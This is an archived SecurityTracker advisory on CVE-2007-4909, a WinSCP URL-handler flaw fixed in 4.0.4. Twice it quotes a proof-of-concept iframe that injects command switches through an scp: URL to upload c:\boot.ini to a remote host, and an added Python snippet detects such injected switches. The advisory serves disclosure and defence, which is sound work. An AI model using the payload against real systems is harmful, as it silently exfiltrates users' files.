SecurityTracker.com
Category:   Application (File Transfer/Sharing)  >   WinSCP
Vendors:   winscp.sourceforge.net
WinSCP URL Protocol Handlers Let Remote Users Upload/Download Arbitrary Files
SecurityTracker Alert ID:  1018697
SecurityTracker URL:  http://securitytracker.com/id/1018697
CVE Reference:   CVE-2007-4909
Updated:  Apr 18 2008
Original Entry Date:  Sep 17 2007
Impact:   Disclosure of system information, Disclosure of user information, Modification of user information
Fix Available:  Yes  Vendor Confirmed:  Yes  Exploit Included:  Yes  
Version(s): 4.0.3 and prior versions
Description:   A vulnerability was reported in WinSCP. A remote user can cause arbitrary files to be uploaded or downloaded.

A remote user can create specially crafted HTML that, when loaded by the target user, will cause arbitrary files on the target user's system to be uploaded to a remote server. Similarly, the remote user can cause arbitrary files to be downloaded to the target user's system.

The HTML can invoke the 'scp://' and 'sftp://' URL protocol handlers.

A demonstration exploit is provided:

<iframe src='scp:password@yourhost.com:" /console /command "option confirm off" "put c:\boot.ini" close exit "'/>

The vendor was notified on July 24, 2007.
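
Why the quote character in the URL matters, as an added example (not part of the advisory and not WinSCP's code): assuming a hypothetical handler registration that passes the URL as a quoted `%1`, this Python code checks whether a URL still arrives as a single argument and flags logged command lines where scripting switches sit beside an scp:/sftp: URL. The template path, function names and sample URLs are constructed for illustration.

```python
# Added illustration; names and the handler template below are assumptions.
URL_SCHEMES = ("scp:", "sftp:")             # protocol handlers named in the advisory
SCRIPT_SWITCHES = ("/console", "/command")  # switches used in the demonstration

# Hypothetical registration: the shell substitutes the URL for %1 inside quotes.
HANDLER_TEMPLATE = r'"C:\Program Files\WinSCP\WinSCP.exe" "%1"'


def split_args(cmdline):
    """Simplified Windows-style split: whitespace separates arguments and
    double quotes group them. Backslash-escaped quotes are not modelled."""
    args, cur, in_quotes, started = [], [], False, False
    for ch in cmdline:
        if ch == '"':
            in_quotes, started = not in_quotes, True
        elif ch.isspace() and not in_quotes:
            if started:
                args.append("".join(cur))
            cur, started = [], False
        else:
            cur.append(ch)
            started = True
    if started:
        args.append("".join(cur))
    return args


def url_stays_single_arg(url):
    """True only if the substituted URL reaches the program as one argument."""
    return split_args(HANDLER_TEMPLATE.replace("%1", url))[1:] == [url]


def injected_switches(cmdline):
    """For a logged command line: scripting switches that appear as separate
    arguments next to an scp:/sftp: URL argument (empty list if none)."""
    args = [a.lower() for a in split_args(cmdline)[1:]]
    if not any(a.startswith(URL_SCHEMES) for a in args):
        return []
    return [a for a in args if a in SCRIPT_SWITCHES]


# Constructed inputs: an ordinary link and one shaped like the demonstration.
BENIGN = "sftp://user@example.invalid/home/user/"
CRAFTED = (r'scp:pw@example.invalid:" /console /command '
           r'"option confirm off" "put C:\sample.txt" close exit "')

if __name__ == "__main__":
    for url in (BENIGN, CRAFTED):
        line = HANDLER_TEMPLATE.replace("%1", url)
        print(url_stays_single_arg(url), injected_switches(line))
```

In process-creation logs, this pattern with a browser as the parent process is the case worth alerting on; a command line typed by an administrator may contain the same switches legitimately.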



Impact:   A remote user can retrieve arbitrary files from the target user's system or download arbitrary files to the target user's system.
Solution:   The vendor has issued a fixed version (4.0.4), available at:

http://winscp.net/eng/download.php

The vendor's advisory is available at:

http://winscp.net/eng/docs/history#4.0.4

Vendor URL:  winscp.net/
Cause:   Access control error
Underlying OS:  Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  WinSCP < 4.04 url protocol handler flaw

-Affected products: WinSCP 4.03 and older

-Details:
By default WinSCP installs url protocol handlers for the scp:// and sftp:// protocols.
These could be used by malicious web content to automatically upload any file from the local system to a remote server, or automatically download files from a remote server to the local system.

Since version 3.8.2 there is a sort of protection against this, but this does not stop all forms of attack.

-PoC:
On a machine you control set up an scp-only account with the username "scp" with any password.
Place this on a website:
<iframe src='scp:password@yourhost.com:" /console /command "option confirm off" "put c:\boot.ini" close exit "'/>
This will upload a file to the server when the page is visited by a user with a vulnerable WinSCP installed.

Downloading a file from the server to any location writable by the current user also works.

-Tested on:
IE6 & IE7 works.
FF older than 2.0.0.5 works.
FF 2.0.0.5 and newer show a confirmation dialog before executing WinSCP.

-Solution
Upgrade to version 4.04 or higher from http://winscp.net/download.php

-Timeline
24-Jul-2007 Vulnerability reported to Martin Prikryl
25-07-2007 Proposed fix to Martin
31-07-2007 Response from Martin
01-09-2007 Martin confirms fix
02-09-2007 New version done
06-09-2007 WinSCP v4.04 released




 
 



Copyright 2019, SecurityGlobal.net LLC